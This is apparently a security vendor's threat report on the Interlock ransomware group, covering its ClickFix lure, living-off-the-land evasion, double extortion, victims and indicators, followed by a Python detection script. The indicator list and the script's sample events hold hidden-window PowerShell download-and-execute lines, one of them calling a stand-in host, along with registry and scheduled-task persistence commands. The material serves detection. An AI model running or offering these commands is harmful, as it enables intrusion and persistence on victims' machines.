Interlock Ransomware: How This Deceptive Cyber Threat Works

The Interlock ransomware group is a major cyber threat that uses social engineering and double extortion to target critical sectors. Understand their "ClickFix" attack method and how to protect your organization from this sophisticated malware.

Key takeaways:

  • Interlock ransomware uses social engineering to trick IT professionals into running malicious code themselves.
  • They hide their activity using legitimate system tools like PowerShell and Cloudflare. This “living-off-the-land” approach makes detection extremely difficult.
  • The ransomware steals data before encrypting it, creating double leverage.

First emerging in September 2024, Interlock ransomware targets critical infrastructure and employs clever psychological tactics to bypass traditional defenses. Unlike typical ransomware, Interlock operates as a closed group, orchestrating high-impact attacks that have crippled healthcare providers and even forced a state government to mobilize its National Guard.

Interlock ransomware overview

Interlock is a financially motivated ransomware group known for its double extortion strategy. This two-pronged attack involves first stealing sensitive data (exfiltration) and then encrypting the victim’s files to render them inaccessible. The group operates without external affiliates, suggesting a tight-knit and skilled team.

Interlock shows a preference for critical sectors where disruption causes maximum pressure, including healthcare, government, education, and technology across North America and Europe.

Interlock ransomware impact and consequences

In April 2025, the group attacked the kidney dialysis provider DaVita, resulting in the theft of 1.5 terabytes of data affecting over 200,000 patients. 

An even more alarming event occurred in July 2025, when Interlock launched a cyberattack against the City of St. Paul, Minnesota. The attack was so severe that it overwhelmed the city’s internal and commercial response capabilities. This prompted Minnesota Governor Tim Walz to issue Emergency Executive Order 25-08, a drastic measure that authorized the Minnesota National Guard to provide cyber protection support.

What are Interlock ransomware attack methods?

Interlock’s success lies in its sophisticated and deceptive tactics, which often turn an organization’s own employees and trusted tools against it.

Each stage of the attack is listed below with the technique used and a step-by-step description of the attacker's actions.

1. Initial Access (technique: "ClickFix" social engineering)
  • Attackers create a fake website impersonating a legitimate software tool (e.g., "Advanced IP Scanner").
  • The site displays a deceptive error message or CAPTCHA, often mimicking a trusted service like Cloudflare.
  • A user is instructed to "fix" the issue by following simple keyboard commands (Win+R, Ctrl+V, Enter).
  • Clicking a button on the page secretly copies a malicious PowerShell command to the user's clipboard.
  • The user unknowingly executes this command, giving the attacker initial access to the system.

2. Execution & Persistence (technique: backdoor installation)
  • The initial PowerShell script runs silently, acting as a backdoor.
  • It begins collecting system information and communicates with the attacker's server.
  • To ensure it can survive a reboot, the script creates new Windows registry keys, establishing persistence on the compromised machine.

3. Defense Evasion (technique: living-off-the-land)
  • Attackers use legitimate tools already present on the system, primarily PowerShell, to run commands and avoid detection.
  • They abuse trusted services like Cloudflare's "TryCloudflare" to tunnel their command-and-control (C2) traffic, making it appear as legitimate network activity.

4. Lateral Movement (technique: credential theft & RDP)
  • Once inside, the attackers use tools to find and steal user credentials.
  • They use these stolen credentials with the Remote Desktop Protocol (RDP) to move across the network to other computers.
  • The ultimate goal is to gain administrative access, often by compromising the network's domain controller.

5. Data Exfiltration (technique: pre-encryption data theft)
  • Before encrypting any files, the attackers identify and steal large volumes of sensitive data.
  • This data is uploaded to attacker-controlled cloud storage, such as an Azure Blob Storage account.
  • This step secures the "second" part of their extortion strategy before the victim is even aware of the breach.

6. Impact (technique: double extortion)
  • File Encryption: The ransomware payload is deployed across the network. All targeted files are encrypted and appended with the .interlock extension, making them unusable.
  • Ransom & Threat: A ransom note is left on the system. The attackers demand payment not only for the decryption key but also threaten to publicly release the stolen data on their "Worldwide Secrets Blog" if the demand is not met.

The "ClickFix" technique

Interlock’s primary weapon for initial access isn’t a software exploit but a brilliant piece of social engineering called “ClickFix.” The attack often targets IT professionals, the very people tasked with security.

Here’s how it works:

  1. An attacker creates a fake website that perfectly mimics a legitimate download page for a popular tool, such as “Advanced IP Scanner.”
  2. The site displays a fake CAPTCHA or error message designed to look like a trusted service like Cloudflare. It instructs the user to “fix” a supposed issue.
  3. The user is told to press a simple key combination: Win + R to open the Run dialog, Ctrl + V to paste, and Enter to execute. The user doesn’t know that clicking the “Fix it” button has already copied a malicious PowerShell command to their clipboard.
  4. By following the instructions, the expert unknowingly pastes and runs the attacker’s code, granting Interlock its initial foothold in the network.

Living-off-the-land technique

Once inside, Interlock excels at evasion by using legitimate tools, a technique known as “living-off-the-land.” They use PowerShell, a scripting tool built into Windows, to execute commands, making their activity difficult to distinguish from normal administrative tasks. 

More insidiously, they abuse Cloudflare’s “TryCloudflare” tunneling tool to hide their command-and-control (C2) communications, effectively wrapping their malicious traffic in a legitimate service to become a ghost in the machine.

What the Interlock ransom note says

The Interlock group attempts to frame its extortion as a form of vigilante justice. In their ransom notes and on their dark web leak site, the “Worldwide Secrets Blog,” they present a strange manifesto:

We don’t just want payment; we want accountability. Our actions send a message to those who hide behind weak defenses… If you don’t take data security seriously, we will on your behalf. Pay attention or pay the price.

As John Riggi, national advisor for cybersecurity for the American Hospital Association (AHA), notes, Interlock has been “directly implicated in high impact ransomware attacks against hospitals and health systems, resulting in the disruption to care delivery and creating a risk to patient and community safety.”

Interlock Ransomware: Indicators of Compromise (IOCs)

System Artifacts (Commands & Registry Keys)

  • PowerShell.exe -w h -c "iex $(irm ...)
    Example of malicious PowerShell execution for the initial download: a hidden window (-w h) running a command that downloads remote content and immediately evaluates it.
  • reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" ...
    Registry Run key used to establish persistence for malware like "ChromeUpdater".
  • schtasks /create /sc DAILY /tn "TaskSystem" ...
    Scheduled task created for persistence, running a command daily.
  • C:\Users\...\AppData\Roaming\node-v22.11.0-win-x64\node[.]exe
    Example file path for a malicious executable (a Node.js runtime dropped under the user's roaming AppData folder).
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v 0neDrive /t REG_SZ /d
    Another example of a registry Run key used for persistence; note the zero in the value name "0neDrive", which imitates the legitimate "OneDrive" name.
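As an added example (not from this article or from Proven Data), the Python below scores constructed Sysmon-style process-creation and DNS-query events against the host and network artifacts described here and in the ClickFix and living-off-the-land sections above: hidden-window PowerShell running iex $(irm ...) spawned from explorer.exe (the Win+R path), Run-key and schtasks persistence, node.exe under AppData\Roaming, and lookups of trycloudflare.com subdomains. The event field names, the loader.example URL, user names and file paths are constructed assumptions, not observed indicators.

```python
import re

# Constructed telemetry shaped like Sysmon process-creation and DNS-query events.
EVENTS = [
    {"id": 1, "type": "process", "parent": "explorer.exe",
     "cmdline": 'PowerShell.exe -w h -c "iex $(irm https://loader.example/stage1)"'},
    {"id": 2, "type": "process", "parent": "powershell.exe",
     "cmdline": r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v ChromeUpdater /t REG_SZ /d C:\Users\u\AppData\Roaming\node-v22.11.0-win-x64\node.exe'},
    {"id": 3, "type": "process", "parent": "powershell.exe",
     "cmdline": r'schtasks /create /sc DAILY /tn "TaskSystem" /tr C:\Users\u\AppData\Roaming\update.cmd'},
    {"id": 4, "type": "process", "parent": "explorer.exe", "cmdline": "node.exe app.js",
     "image": r"C:\Users\u\AppData\Roaming\node-v22.11.0-win-x64\node.exe"},
    {"id": 5, "type": "dns", "query": "quiet-river-1234.trycloudflare.com"},
    {"id": 6, "type": "process", "parent": "explorer.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service"},  # routine admin use, must not alert
    {"id": 7, "type": "dns", "query": "www.microsoft.com"},
]

# Hidden-window PowerShell that downloads and evaluates remote code, e.g. -w h -c "iex $(irm ...)".
HIDDEN_PS_DOWNLOAD_EVAL = re.compile(
    r"powershell(?:\.exe)?\b.*?-w(?:indowstyle)?\s+h(?:idden)?\b.*?"
    r"\b(?:iex|invoke-expression)\b.*?\b(?:irm|iwr|invoke-restmethod|invoke-webrequest)\b", re.I)
RUN_KEY = re.compile(r'\breg(?:\.exe)?\s+add\s+"?HK(?:CU|EY_CURRENT_USER)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\b', re.I)
SCHTASKS_CREATE = re.compile(r"\bschtasks(?:\.exe)?\s+/create\b", re.I)
ROAMING_NODE = re.compile(r"\\AppData\\Roaming\\.*\\node(?:\.exe)?$", re.I)
TRYCLOUDFLARE = re.compile(r"(?:^|\.)trycloudflare\.com$", re.I)

def classify(event):
    """Return the names of the rules this event trips (empty list for benign)."""
    hits = []
    if event["type"] == "process":
        cmd = event["cmdline"]
        if HIDDEN_PS_DOWNLOAD_EVAL.search(cmd):
            hits.append("hidden_ps_download_eval")
            # Win+R runs the pasted command under explorer.exe; that parent marks the ClickFix path.
            if event["parent"].lower() == "explorer.exe":
                hits.append("clickfix_run_dialog")
        if RUN_KEY.search(cmd):
            hits.append("run_key_persistence")
        if SCHTASKS_CREATE.search(cmd):
            hits.append("schtasks_persistence")
        if ROAMING_NODE.search(event.get("image", "")):
            hits.append("node_in_roaming_appdata")
    elif event["type"] == "dns" and TRYCLOUDFLARE.search(event["query"]):
        hits.append("trycloudflare_tunnel")
    return hits

def triage(events):
    """Map event id to its triggered rules, dropping events that trip nothing."""
    return {e["id"]: hits for e in events if (hits := classify(e))}
```

Any single hit warrants a look, but the combination seen here (ClickFix execution, then Run-key or scheduled-task persistence, then a TryCloudflare lookup from a Node.js binary in AppData) is the chain the article describes and should be escalated as one incident.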

How to respond to an attack like the Interlock ransomware

Even with strong defenses, a determined adversary like Interlock can find a way through. The actions taken in the first few hours after a cyberattack can determine whether you face a contained issue or a catastrophic business disruption.

This is precisely why a professional incident response team is essential. Proven Data’s experts are equipped to immediately contain the threat, conduct deep forensic analysis to understand the full scope of the breach, and methodically eradicate the attacker from your network. We handle the entire process, from initial containment to full recovery, ensuring your business can return to normal operations safely and efficiently.

For organizations committed to the highest level of preparedness, an Incident Response Retainer offers the ultimate peace of mind. This proactive partnership places our elite team on standby for you 24/7/365. With a retainer in place, we are already familiar with your environment, allowing us to slash response times, minimize operational downtime, and significantly reduce the financial and reputational damage of an attack.
